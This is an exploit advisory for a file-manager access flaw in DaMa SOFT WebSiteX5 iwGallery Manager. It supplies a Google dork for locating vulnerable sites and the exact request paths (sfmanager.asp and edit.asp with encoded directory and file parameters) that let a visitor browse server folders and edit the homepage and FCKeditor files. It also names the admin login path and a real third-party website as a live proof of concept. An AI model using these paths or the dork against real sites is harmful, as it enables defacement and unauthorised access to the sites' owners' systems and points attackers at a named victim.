#################################################################################################
# Exploit Title : Copyright © 2008 - 2018 by DaMa SOFT WebSiteX5 İwGallery Manager Privilege Escalation Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 30/06/2018
# Vendor Homepage : iwgallery.com ~ websitex5.com
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-264 [ Permissions, Privileges, and Access Controls ]
#################################################################################################
# Google Dork : intext:''by DaMa SOFTWARE 2015''
inurl:''/filemanager/sfmanager.asp''
# Exploit :
/filemanager/sfmanager.asp
/filemanager/sfmanager.asp?dir=%5Ciwgallery
The Homepage can be edit via this vulnerability.
Change The Original Code via =>
..../filemanager/edit.asp?dir=%5CFckEditor%5Ceditor%5Cfilemanager%5Cconnectors&file=uploadtest%2Ehtml
Original FCKeditor URL Page => [ Edit via Filemanager Sfmanager ]
..../FckEditor/editor/filemanager/connectors/uploadtest.html
No Path. Error Page.
Administration Control Panel => /Admin/login.php
...../filemanager/sfmanager.asp?dir=%5CAdmin
#################################################################################################
# Example Site => martinucci-regali.com/filemanager/sfmanager.asp => [ Proof of Concept ] => archive.is/bkAdW
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################